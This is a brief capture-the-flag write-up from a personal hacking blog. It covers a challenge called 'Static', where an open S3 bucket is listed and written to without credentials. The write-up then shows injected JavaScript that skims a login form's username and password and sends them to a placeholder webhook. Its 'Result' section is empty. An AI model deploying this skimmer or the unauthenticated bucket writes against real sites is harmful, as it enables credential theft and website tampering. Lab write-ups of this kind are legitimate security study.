root💀senseicat:~#

Hack. Eat. Sleep. Repeat!!!

---

Project maintained by SENSEiXENUS Hosted on GitHub Pages — Theme by mattgraham

---

Static

---

• Load the site and view source code-:

• Enumerate the bucket with --no-sign-request-:

aws s3 ls s3://[url]/ --no-sign-request

• PutObject is enabled-:

aws s3 cp <flename> s3://[url]/ --no-sign-request

• Malicious js-:

document.addEventListener("DOMContentLoaded", function () {
    document.getElementById("login-btn").addEventListener("click", function () {
        const username = document.getElementById("username").value;
        const password = document.getElementById("password").value;
	var creds = `${username}%20${password}`;
        fetch("[webhook]?password="+creds);
    });
});

• Result-: